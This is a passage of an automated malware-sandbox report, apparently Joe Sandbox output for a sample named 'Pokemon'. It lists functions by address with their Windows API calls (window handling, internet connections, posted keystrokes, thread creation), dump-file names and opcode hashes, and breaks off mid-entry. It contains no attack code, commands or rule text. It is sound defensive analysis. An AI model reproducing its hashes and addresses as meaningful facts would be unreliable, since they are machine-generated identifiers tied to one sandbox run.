                                                                                                                                                                                                                                                                                      • Instruction ID: 077b4d7a26c91325f800326047158017ba4f5c8fc385e5c4f835e5ebb5379439
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a014833cbfe927f166ca7fa453078713f6adf9d28c85d0a5cddd9170b89e53b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49C15A3991464AEFDF20CFA8C980BEDB7F1FF18310F14841AE899A7250D735A951EB64
                                                                                                                                                                                                                                                                                      Function 000CD210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e2474d1ae1b2f015c76ad08f31f11a9675e971d9e7fbdf4c33a997cffcc8cf33
                                                                                                                                                                                                                                                                                      • Instruction ID: d8acb0a57316523c38bd65eb8c5aacaaf00c132c366cce033026ce2c34c29455
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2474d1ae1b2f015c76ad08f31f11a9675e971d9e7fbdf4c33a997cffcc8cf33
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17611371900301AFDB65AFB8DC85FAE7BE8AF11320F09017FF949A7292D671D9408791
                                                                                                                                                                                                                                                                                      Function 00125B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00125C24
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00125C65
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00125C6B
                                                                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00125C6F
                                                                                                                                                                                                                                                                                        • Part of subcall function 001279F2: DeleteObject.GDI32(00000000), ref: 00127A1E
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00125CAB
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00125CB8
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00125CEB
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00125D25
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00125D34
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 761b01275feaa31fa9cd5baadf94ec0970e61506e0dc60a9e2a8ae1e7e1a1645
                                                                                                                                                                                                                                                                                      • Instruction ID: 0522a320dc0bf7d46281572dcf3da52abd6ade1bf86a267237a3b25c46169072
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 761b01275feaa31fa9cd5baadf94ec0970e61506e0dc60a9e2a8ae1e7e1a1645
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E651AF30A40A29BFEF349F64EC89BD83B67EB04764F244111F514AA2E1D776A9B0DB40
                                                                                                                                                                                                                                                                                      Function 000913A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 000D28D1
                                                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000D28EA
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000D28FA
                                                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000D2912
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000D2933
                                                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000911F5,00000000,00000000,00000000,000000FF,00000000), ref: 000D2942
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000D295F
                                                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000911F5,00000000,00000000,00000000,000000FF,00000000), ref: 000D296E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9dbeb45f58b94d30ace87bc1903b708d6e76eec9ff9162b36bd41ea6d04c9551
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c5cb359ae120c63b9cf9334c2d5a538e57bf0dc581288edc456934ed347f933
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dbeb45f58b94d30ace87bc1903b708d6e76eec9ff9162b36bd41ea6d04c9551
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A51883060030AAFDF24CF24CC45BAA7BF5EB58724F104529F952976A0DB70E991EB60
                                                                                                                                                                                                                                                                                      Function 0010CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0010CBC7
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0010CBDA
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0010CBEE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0010CCB7
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: GetLastError.KERNEL32 ref: 0010CD67
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: SetEvent.KERNEL32(?), ref: 0010CD7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010CC98: InternetCloseHandle.WININET(00000000), ref: 0010CD86
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 40cc16e87fd894ba02fb101918b67354dd2cdae09bb39ff45ebda62da2cc4b90
                                                                                                                                                                                                                                                                                      • Instruction ID: 952858c8ac240280067b3f3d45561b246be3352e98ce5cf13bdac6c029815470
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40cc16e87fd894ba02fb101918b67354dd2cdae09bb39ff45ebda62da2cc4b90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7319E71500701BFEB258FB1DE44A6BBBF8FF08314B14462DF99A82650C771E855AFA0
                                                                                                                                                                                                                                                                                      Function 000F2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F43AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetCurrentThreadId.KERNEL32 ref: 000F43B4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F2F00), ref: 000F43BB
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000F2F0A
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000F2F28
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000F2F2C
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000F2F36
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000F2F4E
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 000F2F52
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000F2F5C
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000F2F70
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 000F2F74
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1ed62694949c6be852832b030ad622cbd21c3ee935d0ba081454137bb72d493e
                                                                                                                                                                                                                                                                                      • Instruction ID: 05c4ced4a4588fc26a2a2922c639d7ebcb013ea037d947d2228fa996c8735a27
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ed62694949c6be852832b030ad622cbd21c3ee935d0ba081454137bb72d493e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C701D8307942147BFB206768DC8AFA93F5ADB4DB11F110011F318AE5E0C9F154559AA9
                                                                                                                                                                                                                                                                                      Function 000F2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,000F1D95,?,?,00000000), ref: 000F2159
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,000F1D95,?,?,00000000), ref: 000F2160
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000F1D95,?,?,00000000), ref: 000F2175
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,000F1D95,?,?,00000000), ref: 000F217D
                                                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,000F1D95,?,?,00000000), ref: 000F2180
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000F1D95,?,?,00000000), ref: 000F2190
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(000F1D95,00000000,?,000F1D95,?,?,00000000), ref: 000F2198
                                                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,000F1D95,?,?,00000000), ref: 000F219B
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,000F21C1,00000000,00000000,00000000), ref: 000F21B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c470e5cc7754229a5a4f5a3b53af5e64c7d21ca4b9dc4605d016d543262c29ef
                                                                                                                                                                                                                                                                                      • Instruction ID: 2bf215c909faf0aed371df6a2a1d3be3882d4362455c57f14f5999a405545b98
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c470e5cc7754229a5a4f5a3b53af5e64c7d21ca4b9dc4605d016d543262c29ef
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1801CDB5640308BFE720AFA5EC4EF6B7BACEB88711F414411FA05DB5A1CA709861CB70
                                                                                                                                                                                                                                                                                      Function 00124322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001243C1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001243D6
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001243F0
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00124435
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00124462
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00124490
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                                                                      • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                      • Opcode ID: 66d64e691044b98a7a3aee2b61967c59109cf583cde57a94ff5e5cc0909fea4f
                                                                                                                                                                                                                                                                                      • Instruction ID: 28e37a7840f0fd63d1e63b6255d7abc34bead4a0e079d51e44e2621830e617e4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66d64e691044b98a7a3aee2b61967c59109cf583cde57a94ff5e5cc0909fea4f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B41B171A00329ABDF21DF64DC49BEA7BA9FF48350F100126F958E7291D77599A0CB90
                                                                                                                                                                                                                                                                                      Function 000FC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000FC6C4
                                                                                                                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 000FC6E4
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 000FC71A
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00A85C18), ref: 000FC76B
                                                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(00A85C18,?,00000001,00000030), ref: 000FC793
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                      • String ID: 0$2
                                                                                                                                                                                                                                                                                      • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                      • Opcode ID: c521b89b947601205c6fce0f1c057b179f5d9cb4410b389431e9d90b03fe3501
                                                                                                                                                                                                                                                                                      • Instruction ID: 1650a22427fcfe70f7676a0941c4aab8631934dea22f200e99952cdb37ad83b5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c521b89b947601205c6fce0f1c057b179f5d9cb4410b389431e9d90b03fe3501
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4051A07060830DABEF20EF68DA8AEBEBBF4AF44314F24411AE61197695D3709941DF51
                                                                                                                                                                                                                                                                                      Function 000919CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 000919E1
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 000919FE
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00091A23
                                                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00091A3D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                      • String ID: $'$$'
                                                                                                                                                                                                                                                                                      • API String ID: 4210589936-36325786
                                                                                                                                                                                                                                                                                      • Opcode ID: dd10b0c7f39f01f3fee59803d09c5035751a1c6c15ba7f77fd126882ca22262f
                                                                                                                                                                                                                                                                                      • Instruction ID: 661857bbd718646a98d4a160f816ee41e879f6401e67c0aca20d44c500fb976b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd10b0c7f39f01f3fee59803d09c5035751a1c6c15ba7f77fd126882ca22262f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1415E75A0421BFFDF159F64D844BEEB7B4FB05324F20821AE429A2290C7346E94DB62
                                                                                                                                                                                                                                                                                      Function 000FD11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 000FD1BE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                      • Opcode ID: 353bc597ba045e4803603b41f226064140e82acfa9761fbd653c8912e020fb56
                                                                                                                                                                                                                                                                                      • Instruction ID: 72abd60073032055fdd674b089ff40c02269842fd4fa124e25fe577b51558cb9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 353bc597ba045e4803603b41f226064140e82acfa9761fbd653c8912e020fb56
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C211B73534830EBAEB156B54FC82DFE77DDAF09761B20002BFE04AA5C2E7B46B405160
                                                                                                                                                                                                                                                                                      Function 000FE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
